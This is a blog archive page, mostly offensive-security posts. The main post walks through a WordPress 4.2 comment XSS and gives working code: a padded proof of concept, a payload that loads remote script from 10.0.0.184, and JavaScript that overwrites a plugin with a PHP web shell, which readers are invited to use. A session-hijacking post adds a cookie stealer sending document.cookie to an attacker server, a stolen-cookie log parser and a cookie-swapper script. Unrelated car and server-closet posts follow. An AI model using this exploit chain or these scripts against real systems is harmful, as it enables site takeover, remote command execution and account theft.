Category Archives: Uncategorized

WordPress 4.2 Comment Field Overflow Exploit

While far from unique, the recent vulnerability in the WordPress 4.2 comment system is exceptionally egregious. The vast majority of WordPress attacks target user-installed plugins. Though these plugins often see wide use, exploitation of their vulnerabilities is limited to the sites whose owners individually added them. This vulnerability ships with the default WordPress build.

What’s the big deal?

WordPress is the most popular blogging system in the world and is used by over 60 million websites. The WordPress Content Management System (CMS) is so popular that it often sees use on more than just blogs, yes, even e-commerce sites. 23.3% of the top 10 million websites run WordPress, and unless these sites disabled the default comment system or installed an alternate comment plugin, they are ALL vulnerable.

WordPress released an emergency patch for this vulnerability as 4.2.1, with 4.1.4 for sites still on the 4.1 branch; sites with automatic background updates enabled received the fix without intervention. Upgrading WordPress to version 4.2.2 or later also resolves this issue.

Comment Field Overflow Vulnerability

The vulnerability was discovered by Jouko Pynnönen of Klikki Oy and is a stored Cross Site Scripting (XSS) flaw. Affected software packages:

  • WordPress 4.2
  • WordPress 4.1.2
  • WordPress 4.1.1
  • WordPress 3.9.3

The bug itself is the result of a MySQL column limit. WordPress keeps comment text in a TEXT column, which holds at most 64 KB, and WordPress turns off MySQL’s strict mode, so an oversized comment is silently truncated on insert rather than rejected. The comment has already been filtered by the time it reaches the database, and what the filter saw was a well-formed tag such as <a title='…'></a> with the dangerous text sitting harmlessly inside a quoted attribute value. After the insert, the closing quote and the closing </a> have been cut off, as shown below.

Contents of the mysql database once the comment has been truncated and inserted

At first glance the truncation should simply break the tag and, with it, the XSS, which is why WordPress does nothing further to filter the content: the filter already ran on the complete comment, and nothing re-checks the truncated version. In practice, while WordPress certainly fails to filter the dangerous content, the user’s browser is far more helpful.

Because HTML is so permissive, adherence to well-formed syntax is far from universal, and browsers repair broken markup as they parse it. Presented with the truncated tag, the browser (tested in Chrome and Firefox) supplies the missing closing </a>, as seen in the source view pictured, and the onmouseover that was inert inside the quoted title value becomes a live event handler.

And that, gentlemen, is script execution in the victim’s browser. Now for the fun part: getting a shell!

Proof of Concept Alert

The proof of concept below can be used to determine whether a site is vulnerable. Submit it as a comment, replacing [64KB More As] with enough padding to push the closing quote and </a> past the 64 KB column limit. The absolutely positioned 5000px by 5000px anchor covers the whole page, so the onmouseover fires as soon as the mouse moves over it.

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>
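The filter-then-truncate ordering described above, and the reason the padding in the proof of concept matters, can be reproduced without a WordPress install. The Node.js block below is an added example written for this page, not code from the post or from WordPress: the sanitizer is a deliberately small stand-in for WordPress’s wp_kses (it allows only a quoted title or href on an <a> tag), the 65535-byte limit is the capacity of a MySQL TEXT column, and buildPoc() builds the same shape of comment as the PoC above with a caller-chosen amount of A padding.

```javascript
// Added example (written for this page, not code from the original post or from
// WordPress): a model of the filter-then-truncate ordering behind the bug.
// The sanitizer is a simplified stand-in for wp_kses; the column size is MySQL's.
const TEXT_COLUMN_BYTES = 65535; // MySQL TEXT column capacity

// Build the PoC comment. The handler text sits inside a quoted title value, and
// the padding pushes the closing quote and </a> past the column limit.
function buildPoc(paddingLength) {
  return "<a title='x onmouseover=alert(1) " +
         "style=position:absolute;left:0;top:0;width:5000px;height:5000px " +
         "A".repeat(paddingLength) + "'></a>";
}

// Stand-in for the input filter: accept a single <a ...>...</a> whose attributes
// are all quoted and all on the allow-list. An onmouseover attribute is rejected;
// the same text inside a quoted title value is not, because there it is just text.
function filterAccepts(html) {
  const tag = /^<a\s+([^>]*)>([^<]*)<\/a>$/.exec(html);
  if (tag === null) return false;
  const attrs = tag[1].trim();
  const attrRe = /\s*([a-z]+)=(["'])(.*?)\2/y; // sticky: attributes must be contiguous
  let pos = 0;
  while (pos < attrs.length) {
    attrRe.lastIndex = pos;
    const a = attrRe.exec(attrs);
    if (a === null) return false;                    // unquoted or malformed attribute
    if (!["title", "href"].includes(a[1])) return false;
    pos = attrRe.lastIndex;
  }
  return true;
}

// What the insert does with an oversized value when strict mode is off
// (wpdb turns strict mode off): keep the first 65535 bytes and drop the rest.
function storeTruncating(html) {
  return Buffer.from(html, "utf8").subarray(0, TEXT_COLUMN_BYTES).toString("utf8");
}

// The shape of the fix: refuse anything that would not survive the insert intact,
// so the text the filter approved is exactly the text that gets stored.
function storeChecked(html) {
  if (Buffer.byteLength(html, "utf8") > TEXT_COLUMN_BYTES) {
    throw new Error("comment too long");
  }
  return html;
}

// Run the vulnerable pipeline and report what the filter saw versus what was stored.
function demonstrate(paddingLength) {
  const comment = buildPoc(paddingLength);
  const stored = storeTruncating(comment);
  return {
    filterAcceptedInput: filterAccepts(comment),
    storedBytes: Buffer.byteLength(stored, "utf8"),
    closingTagSurvived: stored.endsWith("'></a>"),
    filterWouldAcceptStored: filterAccepts(stored),
  };
}

console.log(demonstrate(70000));
```

demonstrate(70000) reports that the filter accepted the input, that only 65535 bytes were stored, that the closing '></a> did not survive, and that the stored text would no longer pass the same filter. storeChecked() is the shape of the fix: check the byte length against the column before the insert, so the approved text and the stored text cannot differ.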


Executing Arbitrary Javascript

In order to fully leverage this attack we need the ability to execute arbitrary JavaScript. This can be accomplished by hosting an external .js file and using eval() inside an onmouseover handler on the target to inject a script tag that loads it. The payload is written as the .source of a regular expression literal and passed through unescape() so that it contains no quote characters of its own, which would interfere with the surrounding attribute. See below:

<a title='xxx onmouseover=eval(unescape(/var%20a%3Ddocument.createElement%28%27script%27%29%3Ba.setAttribute%28%27src%27%2C%27http%3A%2f%2f10.0.0.184%2fexploit.js%27%29%3Bdocument.head.appendChild%28a%29/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Escalating To Shell Access in WordPress

Now that we have the ability to execute arbitrary remote JavaScript on the target we need to come up with a snazzy way to use it! In WordPress an Administrator can use the built-in plugin editor to modify installed plugins. This effectively means there is a page on the site that takes POST requests containing PHP code!!!! Hint: the page is called plugin-editor.php. Two caveats: the comment has to be rendered in an Administrator’s browser, because the JavaScript runs with that admin’s session and that is what grants access to the editor; and the editor is unavailable on sites that define DISALLOW_FILE_EDIT as true in wp-config.php.

Using the browser’s XMLHttpRequest object we can make POST and GET requests from JavaScript, and the browser attaches the admin’s cookies to them. We first make a GET request to the plugin editor page to obtain the admin’s nonce (WordPress’s CSRF token, sent in the form as _wpnonce). The next step is to pull the nonce out of the HTTP response and replay it to the plugin editor along with our payload. In this case I URL-encoded my personal PHP shell (because I know the code and like it better than c99 and others). You are welcome to use it if you want; run the source below through a URL decoder if interested. Alternately, you could just URL-encode a PHP meterpreter and browse to the location whenever you are in need of a session.

Note: This attack overwrites one of the WordPress default plugins. I like to use akismet/akismet.php because it is installed by default and performs a useful function (as opposed to the Hello Dolly plugin, which I typically delete on my personal WordPress installs). Whichever file you pick, the nonce is tied to it: plugin-editor.php issues its nonce for the specific file being edited, so the GET and the POST below must name the same plugin file.

// Synchronous GET with the admin's cookies attached; returns the page body.
function get(url)
{
    var http = new XMLHttpRequest();
    http.open( "GET", url, false );
    http.send( null );
    return http.responseText;
}

// Plugin file to overwrite. plugin-editor.php issues its nonce for this exact
// file ("edit-plugin_<file>"), so the GET below and the POST must name the same one.
var pluginFile = "akismet/akismet.php";
var editorUrl  = "/wp-admin/plugin-editor.php?file=" + encodeURIComponent(pluginFile)
               + "&plugin=" + encodeURIComponent(pluginFile);

// URL-encoded PHP shell that becomes the plugin's new contents.
var payload = "78%3C%21-----------------------------------------------------------------%0A%09%09%090sm0s1z%0A%0AThe+Purpose+of+this+file+is+to+act+as+a+Remote+File+Inclusion+vector+to+exploit+a+web+page+through+a+Persisten+Vulnerability.%0A------------------------------------------------------------------%3E%0A%0A%3Chtml%3E%0A%3Ctitle%3EH4X0R3D%3C%2Ftitle%3E%0A%3Chead%3E%0A%0A%3C%21------------------------------%0Awanna+put+some+javascript+here%3F%0A-------------------------------%3E%0A%0A%3C%2Fhead%3E%0A%0A%3Cbody%3E%0A%0A%3C%21---------------------------------------------%0APHP+Terminal%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETerminal%3A%3C%2Fh3%3E%0A%0A%0A%3Cform+method%3D%22post%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22%3E%0A0sm0s1z%3E%3Cinput+type+%3D+%22text%22+name+%3D+%22cmd%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27cmd%27%5D%29%29%0A%7B%0A%0A%0A%0Aecho+%27%3Cpre%3E%27%3B%0A%0A%24cmd+%3D+%24_POST%5B%27cmd%27%5D%3B%0A%0A%24last_line+%3D+system%28%24cmd%2C+%24retval%29%3B%0A%0A%2F%2F+Printing+additional+info%0Aecho+%27%0A%3C%2Fpre%3E%0A%3Chr+%2F%3ELast+line+of+the+output%3A+%27+.+%24last_line+.+%27%0A%3Chr+%2F%3EReturn+value%3A+%27+.+%24retval%3B%0Aecho+%27%3Chr+%2F%3E%27%3B%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%3C%21---------------------------------------------%0APHP+File+Upload+With+Directory+Selection%0A----------------------------------------------%3E%0A%0A%3Ch3%3EFile+Upload%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type%3D%22hidden%22+name%3D%22up%22+%2F%3E%0AChoose+a+file+to+upload%3A+%3Cinput+name%3D%22uploadedfile%22+type%3D%22file%22+%2F%3E%3Cbr+%2F%3E%0AFile+Path%3A%3Cinput+type+%3D+%22text%22+name+%3D+%22path%22+%2F%3E%3Cbr+%2F%3E%0A%3Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27path%27%5D%29%29%0A%7B%0A%0A%0A%24target_path+%3D+%22%22%3B%0A%0A%24target_path+%3D+%24_POST%5B%27path%27%5D%3B%0A%0A%24target_path+%3D+%24target_path+.+basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29%3B+%0A%0Aif%28move_uploaded_file%28%24_FILES%5B%27uploadedfile%27%5D%5B%27tmp_name%27%5D%2C+%24target_path%29%29+%7B%0A++++echo+%22The+file+%22.++basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29.+%0A++++%22+has+been+uploaded%22%3B%0A%7D+else%7B%0A++++echo+%22There+was+an+error+uploading+the+file%2C+please+try+again%21%22%3B%0A%7D%0A%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%3C%21---------------------------------------------%0AVulnerability+Test+Box%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETest+Vectors+Here%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type+%3D+%22text%22+name+%3D+%22test%22+%2F%3E%0A%3C%2Fform%3E%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27test%27%5D%29%29%0A%7B%0A%0A%24test+%3D+%24_POST%5B%27test%27%5D%3B%0A%0Aecho+%24test%3B%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%0A%0A%0A%3C%21---------------------------------------------%0AInclusion%0A----------------------------------------------%3E%0A%0A%0A%3Chr+%2F%3E%0A%3Cpre%3E%0Ainject%3A%09++%09+include%28%27mysite.php%27%29%3B+%3Cbr%3E%0ATo+exploit+Remote+File+Inclusion+Vulnerability%0A%3C%2Fpre%3E%0A%3Chr+%2F%3E%0A";

// Replay the nonce to plugin-editor.php along with the new file contents.
function post(url, csrftoken)
{
    var http = new XMLHttpRequest();
    http.open( "POST", url, false );
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("_wpnonce=" + csrftoken
            + "&_wp_http_referer=" + encodeURIComponent(editorUrl)
            + "&newcontent=" + payload
            + "&action=update"
            + "&file=" + encodeURIComponent(pluginFile)
            + "&plugin=" + encodeURIComponent(pluginFile)
            + "&scrollto=0&submit=Update+File");
    return http.responseText;
}

var page = get(editorUrl);

// The editor form carries: <input type="hidden" id="_wpnonce" name="_wpnonce" value="..." />
var regExp = /name="_wpnonce"\s+value="([^"]+)"/;
var matches = regExp.exec(page);
if (matches === null) {
    throw new Error("no _wpnonce in response: not an admin session, or file editing is disabled");
}
var csrftoken = matches[1];

post("/wp-admin/plugin-editor.php", csrftoken);

The WordPress 4.2 Comment Exploit

I wrote a Metasploit module to trigger this vulnerability:

https://github.com/0sm0s1z/WordPress-Comment-Overflow


The Patch

WordPress patched this flaw by disallowing long comments: a comment too long for the column is now rejected instead of stored. Well done…. Blunt as it is, the length check does close the gap, because the text the filter approved can no longer differ from the text that ends up in the database.


Conclusion

Hopefully this post was an interesting read! If you have any thoughts on the WordPress 4.2 Comment Exploit, my Metasploit module, or a suggestion/topic you’d like covered let me know in the comments below. FYI I use Disqus, sorry :)

Further Reading:

[1] https://blog.sucuri.net/2015/04/critical-persistent-xss-0day-in-wordpress.html
[2] http://arstechnica.com/security/2015/04/just-released-wordpress-0day-makes-it-easy-to-hijack-millions-of-websites/
[3] http://thehackernews.com/2015/04/WordPress-vulnerability.html
[4] http://klikki.fi/adv/wordpress2.html
[5] https://core.trac.wordpress.org/changeset/32311/branches/4.2/src/wp-admin/includes/upgrade.php

Engine Compartment Cleaning

This took a LOT of scrubbing! Followed by painting. Rust was a very significant concern so I spent a lot of time sanding the sucker down and then repainting in order to mitigate long term wear and tear as much as possible.

Tools used:

Rust-Oleum 7582838 Professional Primer Spray Paint, Gray Primer, 15-Ounce

Rust-Oleum 239107 Professional Spray Paint, Semi-Gloss Black, 15-Ounce

After scrubbing I put down a couple coats of primer

primed

Next a couple coats of paint, and she cleaned up nice!

painted

Mustang Project – Week 1

Much tinkering was done. This week I placed an order for an [Ingersoll Rand impact drill and the associated hardware]. While waiting for that, I began work on the vehicle body. I started fabricating the front bumper (note I’m building the chin spoiler separately). I completed the bumper’s shell and should only have to reinforce/layer the part in order to get it into working shape. I also removed the radiator and began shaping the hood.

Lesson learned this week: fiberglass burns! Don’t dump it on yourself (it also turns your jeans into plastic).

Tools used this week:

  • Dewalt Power Drill
  • Orbital Sander
  • Fiberglass Kit
    • Respirator
    • Fiberglass cloth (6oz)
    • Bondo Resin
    • Cheap Brushes
    • Fiberglass Roller
    • Latex Gloves
  • Molding Clay (terra cotta)
  • Insulation (blue) foam
  • Various Screws

The Endeavor

Fiberglass’d

I began by ripping the bumper off with a ratchet. I think it’s safe to discard. It looks bad, is heavy, and I’m not sure it’s structurally necessary. The front pegs it was attached to are still there providing support. Furthermore, once I remove the engine, the engine compartment won’t need as much protection… I think. Anyway it will look cool!

bumper

Next I began work on the replacement bumper. Originally, I wanted to build the whole thing out of clay to form the mold, but that turned out to be prohibitively heavy. The bumper came apart under its own weight, dang gravity!

For my next attempt I purchased [insulation foam] from Lowes. I used this with my [power drill] and some hardware to build the shape. I then sanded it down to allow the clay to better grip the surface. Finally, I covered the thing in clay to form the final shape.

clay_bumper

I now covered the thing in aluminum foil, waxed the foil with a mold release, and applied resin. Next I chopped up the fiberglass cloth and began layering it. I waited for the first layer to be about halfway dry before adding the second, and I applied additional resin after each layer. I only layered it twice for now to give the piece a semi-rigid form but will add additional layers to get the part to where I want it.

Bumper_Fiberglass

The final step will be to sand it until happy. I’m also not sure what it will look like until after I add the chin spoiler so I intend to fabricate that before going much deeper into the weeds on the bumper itself.

Other Work

I ripped out the radiator:

under_the_hood

And I began working on the hood mold:

clay_hood

Alright! That’s all for this week. Next week I should be receiving my air drill, and I intend to buy an engine hoist. The plan is to finish the hood, drain the engine, and get the engine out! Lots of work gotta get ‘er done!

HTTP Code Injection

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

——————–

Here we are discussing session hijacking attacks within the scope of an HTTP/HTTPS conversation. It is important to note several distinctions. Firstly, session hijacking is a weakness of many protocols, but we will only be examining web traffic; secondly, performing session hijacking over HTTPS is a much more involved process than doing the same to its less evolved cousin. In this post we will not be directly attacking HTTPS; we will, however, discuss methods to get around it.

Session Hijacking: The process of assuming control of an active or latent TCP/IP session through impersonation of a user by way of a session identifier as opposed to legitimate authentication credentials.

HTTP Sessions

HTTP is a stateless protocol. This means that the web server does not, and cannot, remember who you are between browser requests. Each time you click a link on a website the web server sees you as an entirely new visitor. For the protocol we have most closely come to identify with the Internet, this is extremely problematic: if a web server does not remember who we are, how can it remember what is in our shopping cart, or more importantly whom that cart belongs to? To solve this issue we have session cookies.

Here’s an example of a session cookie embedded within a TCP Stream:

[Example Pic]

Most importantly, this cookie is sent along with every single HTTP request your browser makes to the associated web server. If we steal this cookie from a victim and tell our browser to present it when communicating with the server, we can essentially become them, with no need for their password. If you are interested in an example of how to modify your browser cookies through URL injection check out this [post].

Stealing Session Cookies

So how do we acquire session cookies from victims? Really the limit here is your creativity, but some criteria must be met. As the penetration tester you must be able to leverage some form of access to the flow of data that the cookie follows. This means you need access to either the data at rest or the data in motion.

Data at Rest

With the exception of potential caching at proxies and other network resources there are two primary locations where cookies live: on the web server and on the client computer. We now have two targets.

Data in Motion

Alternately, if we have access to any host that must route the web traffic it is trivial to pull the session cookie out of the TCP stream, but there is a problem. These days most cookies are no longer sent across the Internet in plaintext; they travel over HTTPS. This means that access to routers along the path the data takes is not enough to steal the plaintext cookie needed to perpetrate session hijacking. We’ll end by demonstrating a method to get around this issue using Subterfuge.

Attacking the Web Server

This attack requires the exploitation of some kind of vulnerability in a web application on the target web server. If you can get code to execute in the victim’s browser then you can steal their session cookies. It is important to note that we only need the victim’s browser to execute the code, not the web server itself. This means that we don’t need to be able to render a server-side language like PHP; for our purposes JavaScript is good enough. One limitation: document.cookie only exposes cookies that were set without the HttpOnly flag. A session cookie marked HttpOnly is still sent by the browser on every request but cannot be read by script, so this stealer will come up empty against it. Below is an example of a simple cookie stealer script:

document.location='http://IP:PORT/grab.cgi?'+document.cookie;

Once we inject this into the target website, the simple act of a victim browsing to the page causes the plaintext cookie to be transmitted to our web server as part of the request URL. Assigning document.location navigates the victim away from the page, which is conspicuous; loading the same URL into an Image object (new Image().src = …) sends the same request without leaving the page. The last step is to retrieve the cookies from our web server. Typically this is done with a catcher script, but we’re going to be a bit different. Below is a bash script to pull the cookies out of your Apache logs. The catcher URL does not even need to exist, since the request is logged, 404 and all, with the cookie in its query string; this means a compromised web server can be used to perpetrate the attack without leaving a catcher script behind as an artifact!

[Apache Logs Cookie Parser Script]
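The bash log parser referenced above is not reproduced on the page. As an added example written for this page (not the author’s script), the Node.js block below does the same job on Apache combined-format access log lines: it keeps only requests to the catcher path, decodes the query string back into the document.cookie string the victim’s browser sent, and records the client IP, time and referer alongside it. The log lines, addresses and cookie values are constructed for the example.

```javascript
// Added example, written for this page (the author's bash script is not on the
// page): pull stolen cookies out of Apache combined-format access log lines with
// Node. The log lines, IPs and cookie values below are constructed for the example.
const SAMPLE_LOG = [
  '203.0.113.5 - - [16/May/2015:18:54:02 -0400] "GET /grab.cgi?PHPSESSID=9f2c1a7e3b;%20remember_me=1 HTTP/1.1" 404 209 "http://victim.example/post/1" "Mozilla/5.0"',
  '203.0.113.5 - - [16/May/2015:18:54:03 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [16/May/2015:19:01:44 -0400] "GET /grab.cgi?wordpress_logged_in_abc123=admin%7C1431900000%7Cdeadbeef HTTP/1.1" 404 209 "http://victim.example/wp-admin/" "Mozilla/5.0"',
  'garbage line that is not in combined log format',
].join("\n");

// client, ident, user, [time], "METHOD target HTTP/x", status, bytes, "referer"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" \d+ \S+ "([^"]*)"/;

// Return one record per request to the catcher path, with the cookie string
// decoded back to the form document.cookie produced (the browser %-encodes the
// spaces and other characters when it puts it in the URL).
function parseCookieHits(logText, catcherPath = "/grab.cgi") {
  const hits = [];
  for (const line of logText.split("\n")) {
    const m = LINE_RE.exec(line);
    if (m === null) continue;                       // not a request line we understand
    const [, ip, time, target, referer] = m;
    const q = target.indexOf("?");
    if (q === -1 || target.slice(0, q) !== catcherPath) continue;
    let cookieHeader;
    try {
      cookieHeader = decodeURIComponent(target.slice(q + 1));
    } catch (e) {
      continue;                                     // malformed %-escape, skip the line
    }
    hits.push({ ip, time, referer, cookieHeader });
  }
  return hits;
}

console.log(parseCookieHits(SAMPLE_LOG));
```

The referer is the page carrying the injected script, which tells you which site each cookie belongs to, and cookieHeader is exactly the string to hand to a cookie swapper. Lines whose target is not the catcher path, and lines that are not in the combined format at all, are skipped.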

Attacking the User

We will only be discussing the Firefox browser here; however, the same techniques can be applied regardless of browser. If you are able to trigger a vulnerability to gain access to a victim’s machine you may be able to directly access the cookie database associated with their browser profile. Firefox keeps persistent cookies in an SQLite database, cookies.sqlite in the profile directory (table moz_cookies); cookies without an expiry are session cookies and are held in memory rather than in that database, so on a live machine the session-restore files are also worth a look. In order to dump the database, run the following commands:

 

Then read the plaintext cookies!

Attacking the Network with Subterfuge

A new feature in Subterfuge 5.1 is Session Hijacking. Subterfuge comes with multiple methods of achieving a man-in-the-middle position on victim traffic. Now it can also harvest web session cookies. In order to do this, start a MITM attack. When a victim browses to a website that uses cookies Subterfuge will automatically log them and display the data on screen.

 

The next step is to use Subterfuge’s cookie swapper script to impersonate the victim. Click on CookieSwapper, and copy the JavaScript that pops up.

 

[CookieSwapper Pic]

 

Paste the script into a text editor. We now have to set the value of the cookie we want to impersonate. In Subterfuge, clicking on the session allows you to copy the cookie value.

 

[Cookie Copy Pic]

 

In your text editor replace the section of the script that says “COOKIE DATA GOES HERE!!!” with the value you copied from Subterfuge (be sure to keep the data within quotes).

The final step is to tell our browser to use this cookie when communicating with the target web server. To do this, first browse to the target website. Once there, open your browser’s scripting console, which lets you run arbitrary JavaScript in the context of the page. In Chrome: right click -> Inspect Element -> click the “show console” icon in the bottom left corner. In Firefox (which we used in the making of this tutorial) use the key command Ctrl + Shift + K. Paste your script into the console at the bottom of the page, denoted by >.

 

[Script Console Pic]

 

Refresh the page and enjoy your session!
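Subterfuge’s CookieSwapper script is only pictured above, so the block below is an added example written for this page as a stand-in for it, not the tool’s own code. It takes the cookie string copied from Subterfuge (in the COOKIE_DATA slot), writes each name=value pair into document.cookie for the current site, and reloads the page; the doc parameter is injectable so the function can be exercised outside a browser.

```javascript
// Added example, written for this page as a stand-in for Subterfuge's CookieSwapper
// (not the tool's own script). Paste the cookie string copied from Subterfuge into
// COOKIE_DATA, run this in the browser console while on the target site, and it
// writes the cookies and reloads. `doc` is injectable so it can run outside a browser.
var COOKIE_DATA = "COOKIE DATA GOES HERE!!!";

// Split a raw "name=value; name2=value2" string into [name, value] pairs. Only the
// first "=" separates name from value, so values containing "=" survive intact.
function parseCookieHeader(header) {
  var pairs = [];
  header.split(";").forEach(function (part) {
    var eq = part.indexOf("=");
    if (eq === -1) return;                          // no "=": not a cookie pair
    var name = part.slice(0, eq).trim();
    if (name) pairs.push([name, part.slice(eq + 1).trim()]);
  });
  return pairs;
}

// Write each pair through doc.cookie with path=/ so it is sent on every path of
// the site. No domain attribute: the browser scopes it to the host you are on,
// which is why the script must be run while the target site is open.
function applyCookieHeader(header, doc) {
  var written = [];
  parseCookieHeader(header).forEach(function (pair) {
    var cookie = pair[0] + "=" + pair[1] + "; path=/";
    doc.cookie = cookie;
    written.push(cookie);
  });
  return written;
}

if (typeof document !== "undefined") {
  if (applyCookieHeader(COOKIE_DATA, document).length > 0) {
    location.reload();
  }
}
```

Run it from the console while on the target site, since a cookie written without a domain attribute is scoped to the host of the page you are on. The copies are written without the Secure or HttpOnly flags; that is fine for impersonation, because those flags only restrict what the attacker’s own browser may read or send, not what the server accepts.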

 

For a video of this attack in action click [here].

Countermeasures

 

I hope that this post thoroughly demonstrates the dangers of session hijacking. Attackers really don’t need your login username and password to wreak havoc on your online footprint. Don’t leave your security up to the vendors, or network operators, because they have no incentive to protect you! Take your security into your own hands.

 

To protect yourself from attacks like this one we recommend the use of encryption to encapsulate your traffic when operating on untrusted networks. OpenVPN is an outstanding protocol and is fairly simple to set up as well. Client programs exist for all major operating systems including Android and iOS. Personally, I use [Link TunnelBlick] on my Mac, and the official clients elsewhere. Note that a VPN only covers the data-in-motion case above, and only for the hop between you and the VPN endpoint; it does nothing against a cookie stolen through a script injected into the site or lifted from the client’s disk.

 

I hope that this post has been informative for you!

Rogue DHCP Server

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

WPAD Hijacking

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

DIY – Custom Server Closet

Why make your Closet this Awesome?

image

  • I have a lot of computer gear
  • Servers are cool
  • Server racks are expensive
  • Staring at the blinking lights for hours on end saves me money on movie tickets

FYI: This is still a work in progress, and I’ll update this post as I continue construction (wanted to use that word so badly, makes me feel all blue collar).

Goal:

Convert a typical bedroom closet into a fully functional server room, without buying any prefabricated equipment.

Table Top

Materials:

  • 41.5″ x 29″ Plexiglass sheet
  • 50″ Wooden Border Panel
  • Hardware: Wood Screws & Machined Bolts + Nuts, Wall Mounts

TableTop

Built-in Server Rack

Materials:

  • Aluminum Rails
  • 2x2x10 Wooden Block
  • Hardware: Wood Screws & Machined Bolts + Nuts

Tools:

  • Cordless Drill
  • Hacksaw
  • File

image

image

I’ll add more info on what I did and how later.

Next Task:

That big open motherboard-looking thing on top of the table is actually going to get built directly into the server rack. To do that I have to add aluminum legs to the back two corners, and then aluminum struts to the sides of the computer case itself (the case is also plexiglass; I built the whole thing a while back from spare parts, eBay and Lowes, and the end result was a dual quad-core Xeon server for about $220 including the case).

At that point the whole mechanism should slide right in, and I’ll be able to add the rest of my gear (mostly cisco catalyst switches) to the rack and be more or less good to go!

Oh! and LEDs too. Let’s not forget those blinking lights…

FAQ

Getting Started

  1. Is Subterfuge free for download?
  2. What Operating Systems is Subterfuge built for?
  3. What dependencies does Subterfuge require?
  4. Help! I’m having browser issues
  5. How can I report a new bug?
  6. I see lots of errors in the terminal window what am I doing wrong?
  7. How do I run Subterfuge as an externally navigable server?
  8. How do I uninstall Subterfuge?
  9. What kind of support is there
  10. How can I contact you?

For issues not covered here see: Troubleshooting

1. Is Subterfuge free for download?

Screen Shot 2013-03-14 at 4.39.59 PM

2. What Operating Systems is Subterfuge built for?

Screen Shot 2013-03-14 at 4.40.13 PM

3. What dependencies does Subterfuge require?

Screen Shot 2013-03-14 at 4.40.23 PM

4. Help! I’m having browser issues 

Screen Shot 2013-03-14 at 4.40.34 PM

5. How can I report a new bug?

Screen Shot 2013-03-14 at 4.40.42 PM

6. I see lots of errors in the terminal window what am I doing wrong? 

Screen Shot 2013-03-14 at 4.40.54 PM

7. How do I run Subterfuge as an externally navigable server? 

Screen Shot 2013-03-14 at 4.41.05 PM

8. How do I uninstall Subterfuge?

Screen Shot 2013-03-14 at 4.41.13 PM

9. What kind of support is there?

Screen Shot 2013-03-14 at 4.41.24 PM

10. How can I contact you?

Screen Shot 2013-03-14 at 4.41.37 PM